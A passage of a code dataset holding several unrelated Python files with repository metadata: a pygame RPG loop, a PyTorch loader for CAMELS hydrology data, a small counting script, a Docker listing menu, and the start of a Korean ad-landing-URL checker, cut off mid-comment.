v.v.panfilov@gmail.com\r\n## https://www.coursera.org/user/2b245f54c4482a14f06c1497686513b5\r\n##\r\n## Code repository at https://github.com/CyberNet-Git/wizard\r\n##\r\n\r\nimport pygame\r\nimport os\r\n\r\nimport Objects\r\nimport ScreenEngine as SE\r\nfrom Logic import GameEngine\r\nimport Service\r\nimport const\r\n\r\npygame.init()\r\ngameDisplay = pygame.display.set_mode(const.SCREEN_DIM, pygame.NOFRAME)\r\npygame.display.set_caption(\"MyRPG\")\r\nKEYBOARD_CONTROL = True\r\n\r\nif not KEYBOARD_CONTROL:\r\n import numpy as np\r\n answer = np.zeros(4, dtype=float)\r\n\r\nclosebtn = pygame.Rect(754, 2, 43, 43)\r\nsize = 32 # 60\r\n\r\ndef game_init():\r\n global engine, movement, direction\r\n engine = GameEngine(size)\r\n movement= dict(zip(\r\n [pygame.K_UP, pygame.K_DOWN, pygame.K_LEFT, pygame.K_RIGHT],\r\n [engine.move_up, engine.move_down, engine.move_left, engine.move_right]\r\n ))\r\n direction = dict(zip(\r\n [pygame.K_UP, pygame.K_DOWN, pygame.K_LEFT, pygame.K_RIGHT],\r\n [(0,-1),(0,1),(-1,0),(1,0)]\r\n ))\r\ngame_init()\r\n\r\nwhile engine.working:\r\n\r\n if KEYBOARD_CONTROL:\r\n for event in pygame.event.get():\r\n if event.type == pygame.QUIT:\r\n engine.working = False\r\n\r\n if event.type == pygame.MOUSEBUTTONUP:\r\n if event.button == 1:\r\n if closebtn.collidepoint(event.pos):\r\n engine.working = False\r\n elif event.button == 3:\r\n pass\r\n\r\n\r\n if event.type == pygame.KEYDOWN:\r\n if event.key == pygame.K_h:\r\n engine.show_help = not engine.show_help\r\n if engine.show_help:\r\n continue\r\n if event.key == pygame.K_KP_PLUS:\r\n size = engine.sprite_size\r\n size = size + 16 if size < 64 else size\r\n #size = 64 if size == 48 else size\r\n engine.set_sprite_size(size)\r\n if event.key == pygame.K_KP_MINUS:\r\n size = engine.sprite_size\r\n size = size - 16 if size > 16 else size\r\n #size = 32 if size == 48 else size\r\n engine.set_sprite_size(size)\r\n if event.key == pygame.K_r:\r\n game_init()\r\n if event.key == pygame.K_m:\r\n engine.show_battle = not engine.show_battle\r\n engine.active_button = 0\r\n if event.key == pygame.K_ESCAPE:\r\n engine.working = False\r\n\r\n if engine.interaction:\r\n if event.key in [pygame.K_LEFT, pygame.K_RIGHT]:\r\n engine.active_button ^= 1\r\n elif event.key in [pygame.K_RETURN, pygame.K_SPACE]:\r\n engine.user_choice = engine.active_button\r\n engine.interact()\r\n\r\n # process Hero movement events\r\n elif engine.game_process:\r\n if event.key in movement.keys():\r\n if movement[event.key]():\r\n pass\r\n elif event.mod & pygame.KMOD_CTRL:\r\n engine.break_wall(direction[event.key])\r\n\r\n if event.key == pygame.K_RETURN:\r\n #create_game()\r\n pass\r\n else:\r\n for event in pygame.event.get():\r\n if event.type == pygame.QUIT:\r\n engine.working = False\r\n if engine.game_process:\r\n actions = [\r\n engine.move_right,\r\n engine.move_left,\r\n engine.move_up,\r\n engine.move_down,\r\n ]\r\n answer = np.random.randint(0, 100, 4)\r\n prev_score = engine.score\r\n move = actions[np.argmax(answer)]()\r\n state = pygame.surfarray.array3d(gameDisplay)\r\n reward = engine.score - prev_score\r\n print(reward)\r\n else:\r\n #create_game()\r\n pass\r\n\r\n gameDisplay.blit(engine.drawer, (5, 35))\r\n engine.drawer.draw(gameDisplay)\r\n\r\n pygame.display.flip()\r\n\r\npygame.display.quit()\r\npygame.quit()\r\nexit(0)\r\n","repo_name":"CyberNet-Git/wizard","sub_path":"Main.py","file_name":"Main.py","file_ext":"py","file_size_in_byte":4410,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"18691323904","text":"import numpy as np\nimport pandas as pd\nimport torch\n\nfrom torch.utils.data import Dataset\nfrom pathlib import Path\nfrom bisect import bisect_right\nfrom abc import ABCMeta, abstractmethod\n\n\nclass AbstractReader(metaclass=ABCMeta):\n \"\"\"Abstract data reader.\n\n Its subclasses need to ensure conversion from raw data to pandas.DataFrame,\n and process invalid data item\n \"\"\"\n\n @abstractmethod\n def _load_data(self, *args, **kwargs):\n \"\"\"\n Subclasses must implement loading inputs and target data.\n \"\"\"\n pass\n\n @abstractmethod\n def _process_invalid_data(self, *args, **kwargs):\n \"\"\"\n Subclasses must implement how to process invalid data item.\n \"\"\"\n pass\n\n @abstractmethod\n def get_df_x(self):\n \"\"\"\n Subclasses must return inputs data with a form of pandas.DataFrame.\n \"\"\"\n pass\n\n @abstractmethod\n def get_df_y(self):\n \"\"\"\n Subclasses must return target data with a form of pandas.DataFrame.\n \"\"\"\n pass\n\n\nclass AbstractStaticReader:\n \"\"\"Abstract static data reader.\n\n 1. Reads data from a static attributes file (.csv).\n 2. Select used attributes and do normalization.\n 3. Need to ensure conversion from static attributes to pandas.DataFrame.\n \"\"\"\n\n @abstractmethod\n def get_df_static(self, basin):\n \"\"\"\n Subclasses must return static data with a form of pandas.DataFrame for a specific basin\n \"\"\"\n pass\n\n\nclass DaymetHydroReader(AbstractReader):\n camels_root = None # needs to be set in class method \"init_root\"\n forcing_root = None\n discharge_root = None\n forcing_cols = [\"Year\", \"Mnth\", \"Day\", \"Hr\", \"dayl(s)\", \"prcp(mm/day)\", \"srad(W/m2)\", \"swe(mm)\", \"tmax(C)\",\n \"tmin(C)\", \"vp(Pa)\"]\n features = [\"prcp(mm/day)\", \"srad(W/m2)\", \"tmax(C)\", \"tmin(C)\", \"vp(Pa)\"]\n discharge_cols = [\"basin\", \"Year\", \"Mnth\", \"Day\", \"QObs\", \"flag\"]\n target = [\"QObs(mm/d)\"]\n\n @classmethod\n def init_root(cls, camels_root): # often be rewritten\n cls.camels_root = Path(camels_root)\n cls.forcing_root = cls.camels_root / \"basin_mean_forcing\" / \"daymet\"\n cls.discharge_root = cls.camels_root / \"usgs_streamflow\"\n\n def __init__(self, basin: str):\n self.basin = basin\n self.area = None\n df = self._load_data()\n df = self._process_invalid_data(df)\n self.df_x = df[self.features] # Datetime as index\n self.df_y = df[self.target] # Datetime as index\n\n def get_df_x(self):\n return self.df_x\n\n def get_df_y(self):\n return self.df_y\n\n def _load_data(self):\n df_forcing = self._load_forcing()\n df_discharge = self._load_discharge()\n df = pd.concat([df_forcing, df_discharge], axis=1)\n\n return df\n\n # Loading meteorological data\n def _load_forcing(self):\n files = list(self.forcing_root.glob(f\"**/{self.basin}_*.txt\"))\n if len(files) == 0:\n raise RuntimeError(f\"No forcing file found for Basin {self.basin}\")\n elif len(files) >= 2:\n raise RuntimeError(f\"Redundant forcing files found for Basin {self.basin}\")\n else:\n file_path = files[0]\n\n # read-in data and convert date to datetime index\n df = pd.read_csv(file_path, sep=r\"\\s+\", header=3) # \\s+ means matching any whitespace character\n dates = df.Year.map(str) + \"/\" + df.Mnth.map(str) + \"/\" + df.Day.map(str)\n df.index = pd.to_datetime(dates, format=\"%Y/%m/%d\")\n\n # Line 2 (starting at 0) of the file is the area value\n with open(file_path) as fp:\n # readline is faster than readines, if only read two lines\n fp.readline()\n fp.readline()\n content = fp.readline().strip()\n area = int(content)\n self.area = area\n\n return df[self.features]\n\n # Loading runoff data\n def _load_discharge(self):\n files = list(self.discharge_root.glob(f\"**/{self.basin}_*.txt\"))\n if len(files) == 0:\n raise RuntimeError(f\"No discharge file found for Basin {self.basin}\")\n elif len(files) >= 2:\n raise RuntimeError(f\"Redundant discharge files found for Basin {self.basin}\")\n else:\n file_path = files[0]\n\n df = pd.read_csv(file_path, sep=r\"\\s+\", header=None, names=self.discharge_cols)\n dates = df.Year.map(str) + \"/\" + df.Mnth.map(str) + \"/\" + df.Day.map(str)\n df.index = pd.to_datetime(dates, format=\"%Y/%m/%d\")\n\n # normalize discharge from cubic feed per second to mm per day\n assert len(self.target) == 1\n df[self.target[0]] = 28316846.592 * df[\"QObs\"] * 86400 / (self.area * 10 ** 6)\n\n return df[self.target]\n\n # Processing invalid data\n def _process_invalid_data(self, df: pd.DataFrame):\n # Delete all row, where exits NaN (only discharge has NaN in this dataset)\n len_raw = len(df)\n df = df.dropna()\n len_drop_nan = len(df)\n if len_raw > len_drop_nan:\n print(f\"Deleted {len_raw - len_drop_nan} records because of NaNs {self.basin}\")\n\n # Deletes all records, where no discharge was measured (-999)\n df = df.drop((df[df['QObs(mm/d)'] < 0]).index)\n len_drop_neg = len(df)\n if len_drop_nan > len_drop_neg:\n print(f\"Deleted {len_drop_nan - len_drop_neg} records because of negative discharge {self.basin}\")\n\n return df\n\n\nclass MaurerExtHydroReader(DaymetHydroReader):\n camels_root = None # needs to be set in class method \"init_root\"\n forcing_root = None\n discharge_root = None\n\n @classmethod\n def init_root(cls, camels_root):\n cls.camels_root = Path(camels_root)\n cls.forcing_root = cls.camels_root / \"basin_mean_forcing\" / \"maurer_extended\"\n cls.discharge_root = cls.camels_root / \"usgs_streamflow\"\n\n def __init__(self, basin: str):\n super().__init__(basin)\n\n\nclass NldasExtHydroReader(DaymetHydroReader):\n camels_root = None # needs to be set in class method \"init_root\"\n forcing_root = None\n discharge_root = None\n forcing_cols = [\"Year\", \"Mnth\", \"Day\", \"Hr\", \"Dayl(s)\", \"PRCP(mm/day)\", \"SRAD(W/m2)\", \"SWE(mm)\", \"Tmax(C)\",\n \"Tmin(C)\", \"Vp(Pa)\"]\n features = [\"PRCP(mm/day)\", \"SRAD(W/m2)\", \"Tmax(C)\", \"Tmin(C)\", \"Vp(Pa)\"]\n\n @classmethod\n def init_root(cls, camels_root):\n cls.camels_root = Path(camels_root)\n cls.forcing_root = cls.camels_root / \"basin_mean_forcing\" / \"nldas_extended\"\n cls.discharge_root = cls.camels_root / \"usgs_streamflow\"\n\n def __init__(self, basin: str):\n super().__init__(basin)\n\n\nclass HydroReaderFactory:\n \"\"\"\n Simple factory for producing HydroReader\n \"\"\"\n\n @staticmethod\n def get_hydro_reader(camels_root, forcing_type, basin):\n if forcing_type == \"daymet\":\n DaymetHydroReader.init_root(camels_root)\n reader = DaymetHydroReader(basin)\n elif forcing_type == \"maurer_extended\":\n MaurerExtHydroReader.init_root(camels_root)\n reader = MaurerExtHydroReader(basin)\n elif forcing_type == \"nldas_extended\":\n NldasExtHydroReader.init_root(camels_root)\n reader = NldasExtHydroReader(basin)\n else:\n raise RuntimeError(f\"No such hydro reader type: {forcing_type}\")\n\n return reader\n\n\nclass CamelsDataset(Dataset):\n \"\"\"CAMELS dataset working with subclasses of AbstractHydroReader.\n\n It works in a list way: the model trains, validates and tests with all of basins in attribute:basins_list.\n\n Attributes:\n camels_root: str\n The root of CAMELS dataset.\n basins_list: list of str\n A list contains all needed basins-ids (8-digit code).\n past_len: int\n Length of the past time steps for discharge data.\n pred_len: int\n Length of the predicting time steps for discharge data.\n And it is worth noting that the used length of meteorological data is (past_len + :pred_len).\n stage: str\n One of ['train', 'val', 'test'], decide whether calculating mean and std or not.\n Calculate mean and std in training stage.\n dates: List of pd.DateTimes\n Means the date range that is used, containing two elements, i.e, start date and end date.\n x_dict: dict as {basin: np.ndarray}\n Mapping a basin to its corresponding meteorological data.\n y_dict: dict as {basin: np.ndarray}\n Mapping a basin to its corresponding discharge data.\n length_ls: list of int\n Contains number of serialized sequences of each basin corresponding to basins_list.\n index_ls: list of int\n Created from length_ls, used in __getitem__ method.\n num_samples: int\n Number of serialized sequences of all basins.\n x_mean: numpy.ndarray\n Mean of input features derived from the training stage.\n Has to be provided for 'val' or 'test' stage.\n Can be retrieved if calling .get_means() on the data set.\n y_mean: numpy.ndarray\n Mean of output features derived from the training stage.\n Has to be provided for 'val' or 'test' stage.\n Can be retrieved if calling .get_means() on the data set.\n x_std: numpy.ndarray\n Std of input features derived from the training stage.\n Has to be provided for 'val' or 'test' stage.\n Can be retrieved if calling .get_stds() on the data set.\n y_std: numpy.ndarray\n Std of output features derived from the training stage.\n Has to be provided for 'val' or 'test' stage.\n Can be retrieved if calling .get_stds() on the data set.\n \"\"\"\n\n def __init__(self, camels_root: str, forcing_type: str, basins_list: list, past_len: int, pred_len: int, stage: str,\n dates: list, x_mean=None, y_mean=None, x_std=None, y_std=None, y_stds_dict=None):\n \"\"\"Initialization\n\n x_mean, y_mean, x_std, y_std should be provided if stage != \"train\".\n \"\"\"\n self.camels_root = camels_root\n self.basins_list = basins_list\n self.past_len = past_len\n self.pred_len = pred_len\n self.stage = stage\n self.dates = dates\n self.x_dict = dict()\n self.y_dict = dict()\n self.date_index_dict = dict()\n self.length_ls = list()\n\n if y_stds_dict is None:\n self.y_stds_dict = dict()\n else:\n self.y_stds_dict = y_stds_dict\n\n self._load_data(forcing_type)\n # Calculate mean and std\n if self.stage == 'train':\n self.x_mean, self.x_std = self.calc_mean_and_std(self.x_dict)\n self.y_mean, self.y_std = self.calc_mean_and_std(self.y_dict)\n else:\n self.x_mean = x_mean\n self.y_mean = y_mean\n self.x_std = x_std\n self.y_std = y_std\n self.normalize_data()\n\n self.num_samples = 0\n for item in self.length_ls:\n self.num_samples += item\n\n self.index_ls = [0]\n for i in range(len(self.length_ls)):\n v = self.index_ls[i] + self.length_ls[i]\n self.index_ls.append(v)\n\n def __len__(self):\n return self.num_samples\n\n def __getitem__(self, idx: int):\n basin_idx = bisect_right(self.index_ls, idx) - 1\n local_idx = idx - self.index_ls[basin_idx]\n basin = self.basins_list[basin_idx]\n x_seq = self.x_dict[basin][local_idx: local_idx + self.past_len + self.pred_len, :]\n y_seq_past = self.y_dict[basin][local_idx: local_idx + self.past_len, :]\n y_seq_future = self.y_dict[basin][local_idx + self.past_len: local_idx + self.past_len + self.pred_len, :]\n\n return x_seq, y_seq_past, y_seq_future, self.y_stds_dict[basin]\n\n def _load_data(self, forcing_type):\n # Loading vanilla data\n basin_number = len(self.basins_list)\n for idx, basin in enumerate(self.basins_list):\n print(self.stage, f\"{basin}: loading data %.4f\" % (idx / basin_number))\n reader = HydroReaderFactory.get_hydro_reader(self.camels_root, forcing_type, basin)\n df_x = reader.get_df_x()\n df_y = reader.get_df_y()\n\n # Select date\n df_x = df_x[self.dates[0]:self.dates[1]]\n df_y = df_y[self.dates[0]:self.dates[1]]\n assert len(df_x) == len(df_y)\n self.date_index_dict[basin] = df_x.index\n\n # Select used features and discharge\n x = df_x.values.astype(\"float32\")\n y = df_y.values.astype(\"float32\")\n self.x_dict[basin] = x\n self.y_dict[basin] = y\n\n self.length_ls.append(len(x) - self.past_len - self.pred_len + 1)\n # Calculate mean and std in training stage\n if self.stage == 'train':\n self.y_stds_dict[basin] = y.std(axis=0).item()\n\n @staticmethod\n def calc_mean_and_std(data_dict):\n data_all = np.concatenate(list(data_dict.values()), axis=0) # CAN NOT serializable\n nan_mean = np.nanmean(data_all, axis=0)\n nan_std = np.nanstd(data_all, axis=0)\n return nan_mean, nan_std\n\n def _local_normalization(self, feature: np.ndarray, variable: str) -> np.ndarray:\n if variable == 'inputs':\n feature = (feature - self.x_mean) / self.x_std\n elif variable == 'output':\n feature = (feature - self.y_mean) / self.y_std\n else:\n raise RuntimeError(f\"Unknown variable type {variable}\")\n return feature\n\n def normalize_data(self):\n # Normalize data\n for idx, basin in enumerate(self.basins_list):\n print(self.stage, \"Normalizing %.4f\" % (idx / len(self.basins_list)))\n x = self.x_dict[basin]\n y = self.y_dict[basin]\n # Normalize data\n x_norm = self._local_normalization(x, variable='inputs')\n y_norm = self._local_normalization(y, variable='output')\n self.x_dict[basin] = x_norm\n self.y_dict[basin] = y_norm\n\n def local_rescale(self, feature: np.ndarray, variable: str) -> np.ndarray:\n if variable == 'inputs':\n feature = feature * self.x_std + self.x_mean\n elif variable == 'output':\n feature = feature * self.y_std + self.y_mean\n else:\n raise RuntimeError(f\"Unknown variable type {variable}\")\n return feature\n\n def get_means(self):\n return self.x_mean, self.y_mean\n\n def get_stds(self):\n return self.x_std, self.y_std\n\n @classmethod\n def get_instance(cls, past_len: int, pred_len: int, stage: str, specific_cfg: dict,\n x_mean=None, y_mean=None, x_std=None, y_std=None, y_stds_dict=None):\n final_data_path = specific_cfg[\"final_data_path\"]\n camels_root = specific_cfg[\"camels_root\"]\n basins_list = specific_cfg[\"basins_list\"]\n forcing_type = specific_cfg[\"forcing_type\"]\n start_date = specific_cfg[\"start_date\"]\n end_date = specific_cfg[\"end_date\"]\n if final_data_path is None:\n dates = [start_date, end_date]\n instance = cls(camels_root, forcing_type, basins_list, past_len, pred_len, stage,\n dates, x_mean, y_mean, x_std, y_std, y_stds_dict)\n return instance\n else:\n if final_data_path.exists():\n instance = torch.load(final_data_path)\n return instance\n else:\n dates = [start_date, end_date]\n instance = cls(camels_root, forcing_type, basins_list, past_len, pred_len, stage,\n dates, x_mean, y_mean, x_std, y_std, y_stds_dict)\n final_data_path.parent.mkdir(exist_ok=True, parents=True)\n torch.save(instance, final_data_path)\n return instance\n\n\nclass StaticReader(AbstractStaticReader):\n \"\"\"Static hydrological data reader.\n\n Reads data from a selected norm static attributes file (.csv).\n Need to ensure conversion from static attributes to pandas.DataFrame.\n \"\"\"\n\n def __init__(self, camels_root):\n self.camels_root = Path(camels_root)\n self.static_file_path = Path(\n \"/data1/du/CAMELS/CAMELS-US\") / \"camels_attributes_v2.0\" / \"selected_norm_static_attributes.csv\"\n self.df_static = pd.read_csv(self.static_file_path, header=0, dtype={\"gauge_id\": str}).set_index(\"gauge_id\")\n self.df_static = self.df_static.astype(\"float32\")\n\n def get_df_static(self, basin):\n return self.df_static.loc[[basin]].values\n\n\nclass CamelsDatasetWithStatic(CamelsDataset):\n \"\"\"CAMELS dataset with static attributes injected into serialized sequences.\n\n Inherited from NullableCamelsDataset\n\n \"\"\"\n\n def __init__(self, camels_root: str, forcing_type: str, basins_list: list, past_len: int, pred_len: int, stage: str,\n dates: list, x_mean=None, y_mean=None, x_std=None, y_std=None, y_stds_dict=None):\n self.static_reader = StaticReader(camels_root)\n self.norm_static_fea = dict()\n super().__init__(camels_root, forcing_type, basins_list, past_len, pred_len, stage,\n dates, x_mean, y_mean, x_std, y_std, y_stds_dict)\n\n def _load_data(self, forcing_type):\n # Loading vanilla data\n basin_number = len(self.basins_list)\n for idx, basin in enumerate(self.basins_list):\n print(self.stage, f\"{basin}: loading data %.4f\" % (idx / basin_number))\n reader = HydroReaderFactory.get_hydro_reader(self.camels_root, forcing_type, basin)\n df_x = reader.get_df_x()\n df_y = reader.get_df_y()\n\n # Select date\n df_x = df_x[self.dates[0]:self.dates[1]]\n df_y = df_y[self.dates[0]:self.dates[1]]\n assert len(df_x) == len(df_y)\n self.date_index_dict[basin] = df_x.index\n\n # Select used features and discharge\n x = df_x.values.astype(\"float32\")\n y = df_y.values.astype(\"float32\")\n\n self.x_dict[basin] = x\n self.y_dict[basin] = y\n\n self.length_ls.append(len(x) - self.past_len - self.pred_len + 1)\n # adding static attributes\n self.norm_static_fea[basin] = self.static_reader.get_df_static(basin)\n\n # Calculate mean and std in training stage\n if self.stage == 'train':\n self.y_stds_dict[basin] = y.std(axis=0).item()\n\n def normalize_data(self):\n # Normalize data\n for idx, basin in enumerate(self.basins_list):\n print(self.stage, \"Normalizing %.4f\" % (idx / len(self.basins_list)))\n x = self.x_dict[basin]\n y = self.y_dict[basin]\n # Normalize data\n x_norm = self._local_normalization(x, variable='inputs')\n y_norm = self._local_normalization(y, variable='output')\n norm_static_fea = self.norm_static_fea[basin].repeat(x_norm.shape[0], axis=0)\n x_norm_static = np.concatenate([x_norm, norm_static_fea], axis=1)\n self.x_dict[basin] = x_norm_static\n self.y_dict[basin] = y_norm\n\n def __getitem__(self, idx: int):\n basin_idx = bisect_right(self.index_ls, idx) - 1\n local_idx = idx - self.index_ls[basin_idx]\n basin = self.basins_list[basin_idx]\n x_seq = self.x_dict[basin][local_idx: local_idx + self.past_len + self.pred_len, :]\n y_seq_past = self.y_dict[basin][local_idx: local_idx + self.past_len, :]\n y_seq_future = self.y_dict[basin][local_idx + self.past_len: local_idx + self.past_len + self.pred_len, :]\n\n return x_seq, y_seq_past, y_seq_future, self.y_stds_dict[basin]\n\n\n\nclass CamelsDatasetLimited(CamelsDataset):\n def __getitem__(self, idx: int):\n basin_idx = bisect_right(self.index_ls, idx) - 1\n local_idx = idx - self.index_ls[basin_idx]\n basin = self.basins_list[basin_idx]\n x_seq = self.x_dict[basin][local_idx: local_idx + self.past_len, :]\n y_seq_past = self.y_dict[basin][local_idx: local_idx + self.past_len, :]\n y_seq_future = self.y_dict[basin][local_idx + self.past_len: local_idx + self.past_len + self.pred_len, :]\n\n return x_seq, y_seq_past, y_seq_future, self.y_stds_dict[basin]\n\n\nclass DatasetFactory:\n @staticmethod\n def get_dataset_type(use_future_fea, use_static):\n if (not use_future_fea) and use_static:\n raise RuntimeError(\"No implemented yet.\")\n elif not use_future_fea:\n ds = CamelsDatasetLimited\n elif use_static:\n ds = CamelsDatasetWithStatic\n else:\n ds = CamelsDataset\n return ds\n","repo_name":"iThronne/RR-Former","sub_path":"data/dataset.py","file_name":"dataset.py","file_ext":"py","file_size_in_byte":20807,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"60"} +{"seq_id":"4148645910","text":"infile = \"epi_enzyme_prelim_study_search_no_filter.txt\"\r\noutfile = \"distribution_epi_enzyme_prelim_study_search_no_filter.txt\"\r\n\r\nthefile = open(outfile, 'w')\r\n\r\nwith open(infile, \"r\") as ins:\r\n fullfile = ins.readlines()[1:]\r\nins.close()\r\nc = 0\r\n\r\ncount = {}\r\n\r\nfor fn in fullfile:\r\n gn = fn.strip()\r\n temp = gn.split(\"\\t\")\r\n ids = temp[1].split(\",\")\r\n for each_id in ids:\r\n if each_id in count:\r\n count[each_id] += 1\r\n else:\r\n count[each_id] = 1\r\n\r\nfor key in count:\r\n thefile.write(key + \"\\t\" + str(count[key]) + \"\\n\")\r\n","repo_name":"VidhurDS/misc-scripts","sub_path":"distribution_finder.py","file_name":"distribution_finder.py","file_ext":"py","file_size_in_byte":577,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"21121305980","text":"from active_conts import list_active_containers\nfrom inactive_conts import list_inactive_containers\nfrom inactive_vols import list_unassociated_volumes\n\ndef main_menu():\n while True:\n print(\"\\nMENU:\")\n print(\"1. List active docker containers and their associated volumes.\")\n print(\"2. List inactive docker containers and their associated volumes.\")\n print(\"3. List volumes that are not associated with a container.\")\n print(\"4. Quit\")\n\n choice = input(\"Please select an option: \")\n\n if choice == '1':\n list_active_containers()\n elif choice == '2':\n list_inactive_containers()\n elif choice == '3':\n list_unassociated_volumes()\n elif choice == '4':\n print(\"Exiting.\")\n break\n else:\n print(\"Invalid option.\")\n\nif __name__ == \"__main__\":\n main_menu()\n\n","repo_name":"saadimalik211/gensosekai","sub_path":"dockercontrol/pythontesting/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":897,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"28585192399","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Oct 18 13:38:02 2019\n\n@author: ptck\n\"\"\"\n\n\n\n#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Aug 30 13:44:22 2019\n\n@author : ptck\n\"\"\"\nimport csv\nimport sys, traceback, time\n#from os import environ\n#import time\n\n\n#import os\nimport time\nimport warnings\nwarnings.filterwarnings(\"ignore\", category=DeprecationWarning)\nwarnings.filterwarnings(\"ignore\", category=FutureWarning)\nimport urllib3\nurllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)\n\nimport requests\nfrom bs4 import BeautifulSoup\n\n#from pandas import Series, read_csv\n\n#from multiprocessing import Pool\nfrom urllib import parse\n#from functools import partial\nimport datetime\nfrom os import makedirs\nfrom os import chdir\n\n\n#chdir('/Users/ptck/Downloads')\nDa_1 = datetime.datetime.now()\nDATE = Da_1.strftime('%Y/%m/%d/%H')\n\n\norigin_input_path = './dbproj/includes/'\norigin_output_path='./output/%s/'%(DATE)\n\n\n\ntry :\n makedirs(origin_output_path)\nexcept:\n pass\n\n\n\n\n#합쳐진 csv 파일 불러오기\n \n\ndef read_file(filename) :\n origin_input_path = './dbproj/includes/'\n # csv file 읽기 위함\n f = filename\n models = dict()\n with open(origin_input_path+f, 'r', newline='',encoding='euc-kr') as file:\n models['품목']=[]\n models['그룹']=[]\n models['키워드']=[]\n models['랜딩URL']=[]\n models['매체']=[]\n for num,line in enumerate(file.readlines()):\n # 0번째에는 품목명이니까 제외\n lines = line.split(',')\n # 0row에는 필요없는 정보\n if num <=0:\n continue\n # 품목이 빈 스트링일 경우 더이상 유알엘 없음\n if lines[0]=='':\n break\n \n # keyword 삽입\n models['품목'].append(lines[0])\n models['그룹'].append(lines[1])\n models['키워드'].append(lines[2])\n models['랜딩URL'].append(lines[3])\n models['매체'].append(lines[4])\n # 모델명만 가져오기 위함\n #try :\n #\n # a = lines.index('')\n # models['model'].append(lines[1:a])\n #except:\n # models['model'].append(lines[1:])\n \n \n #print(csv_data)\n return models\n\n\n\n\n#Table = read_csv(origin_input_path+'Keyword.csv',encoding='euc-kr',low_memory=False)\nTable = read_file('Keyword.csv')\n\nkey = Table[\"품목\"]\ngroup = Table[\"그룹\"]\nkeyword = Table[\"키워드\"]\nurl = Table[\"랜딩URL\"]\nngd = Table[\"매체\"]\n\ndef Check_Unicode(keyword, url) :\n check_col = []\n te = []\n \n for i in range(len(url)):\n url_1 = url[i][::-1]\n\n cut_num = url_1.find(\"_\")\n\n try :\n fin_num = url_1.find(\"#\")\n except:\n fin_num = 0\n if cut_num <= fin_num:\n fin_num = 0 \n url_3 = url_1[fin_num:cut_num]\n url_final = url_3[::-1]\n text = parse.unquote(url_final) #url의 유니코드가 한글로 바뀐게 text\n text_upper = text.upper()\n te.append(text_upper)\n if keyword[i].upper() == te[-1] :\n check_col.append(\"일치\")\n else : \n check_col.append(\"불일치\")\n return check_col,te\n\n\ndef Concate_Table(keyword,url):\n check = Check_Unicode(keyword, url)\n\n return check \n\n\n\"이 위는 URL cid 변환 정상 여부 체크\"\n\"---------------------------------------------------------------\"\n\"여기서부턴 URL 랜딩 정상 여부 체크\"\n\n\ndef remove_dup(url):\n # dup_N 은 중복 url 갯수, short_url은 cid값을 다 제거한 url\n \n dup_N = []\n short_url = []\n url_1 = []\n for i in url:\n if '?' in i:\n \n num_1 = i.index('?')\n \n url_1.append(i[:num_1])\n else:\n url_1.append(i)\n #know_url.append(i[num_2+4:num_1])\n #N = list(set(know_url))\n a = 1\n\n for i,j in enumerate(url_1) :\n if i == len(url_1)-1:\n dup_N.append(a)\n short_url.append(j)\n break\n elif (i == 0) & (j != url_1[1]):\n dup_N.append(a)\n short_url.append(j)\n continue\n elif j == url_1[i+1]:\n a+=1\n continue\n \n else:\n dup_N.append(a)\n short_url.append(j)\n a = 1\n continue\n \n return short_url, dup_N\n\n\ndef Check_URL(k): \n start_time = time.time()\n URL_list = k\n\n CheckList = []\n \n for url in URL_list :\n \n while True:\n try:\n url_data = requests.get(url, verify=False)\n \n url_check = url_data.status_code\n break\n except:\n print(\"Connection refused by the server..\")\n print(\"Let me sleep for 5 seconds\")\n time.sleep(5)\n continue\n if 200 <= url_check <300:\n CheckList.append(\"정상 랜딩중\")\n \n elif 300 <= url_check <400 :\n CheckList.append(\"비정상 랜딩중 (리다이렉팅)\")\n else:\n print(url)\n print(url_check)\n CheckList.append(\"비정상 랜딩중\")\n \n '''\n if len(url_redirected) == 0: # 리다이렉트 되지 않는 경우라면 url이 정상랜딩 혹은 랜딩이 안되는 경우 2가지있음\n \n if url_check == 200 :\n \n \n # if soup.find(\"div\",{\"class\":'event-end-txt'}).find('strong').text != \"이벤트가 종료되었습니다.\" :\n \n # 이렇게 바꿔야 하지 않을까?? \n if soup.find(\"div\",{\"class\":'event-end-txt'}) : \n if soup.find(\"div\",{\"class\":'event-end-txt'}).find('strong').text != \"이벤트가 종료되었습니다.\" :\n CheckList.append(\"비정상 랜딩중 (이벤트 종료)\")\n A.append(\"\")\n \n # 200 에는 정상 랜딩 중과 이벤트 종료되었습니다 두 경우가 있음. 이벤트종료는 비정상 랜딩으로 구분해줘야함\n \n else : \n CheckList.append(\"정상 랜딩중\")\n A.append(\"\")\n #else: # 200번이지만, 이벤트가 종류되었습니다 문구가 있는 경우는 비정상 랜딩으로\n # CheckList.append(\"비정상 랜딩중 (이벤트 종료)\")\n \n else :\n CheckList.append(\"URL 찾을 수 없음\") #200번호대는 정상이고 나머지는 리다이랙트 되는경우아니니까 url찾을 수 없음이 맞음 \n A.append(url_check)\n else: # 리다이렉트 되는 경우 이다. \n num = len(url_redirected) - 1 # 리스트 0부터 세니까\n Last_redirected = url_redirected[num] # 마지막으로 리다이렉트된 주소의 300 200 이런 값들이 나옴\n #print(Last_redirected) # 이부분해봐야 뒷부분이 명확해질듯. 200,300 값나오는거면 바로 비교해도되고 아니면 url로 바꺼 비교해도되고\n if Last_redirected == 200 :\n CheckList.append(\"비정상 랜딩중 (리다이렉팅)\") ### 수정필요! 리다이렉트 되면 비정상으로 해야함. 그럼 그냥 redirected되면 다 비정상으로\n A.append(Last_redirected)\n #\n # 이부분이 수정요함. 리다이렉트로 정��랜딩이 되도 아예 다른 페이지가 뜰 수가 있다면 .. 그리고 이경우가 있다면 우리가 확인 할 방법이 없음.\n # 페이지를 하나하나 다 눈으로 확인해야하니까. \n ### 아니면 리다이렉트되기전의 url에 박힌 상품 변환유니코드가 마지막 리다이렉트된 페이지 소스에 있다면 제대로 랜딩된거라 인식하게끔 로직을 짜던가\n else: \n CheckList.append(\"비정상 랜딩중 (URL 찾을 수 없음)\")\n A.append(Last_redirected)\n # 이 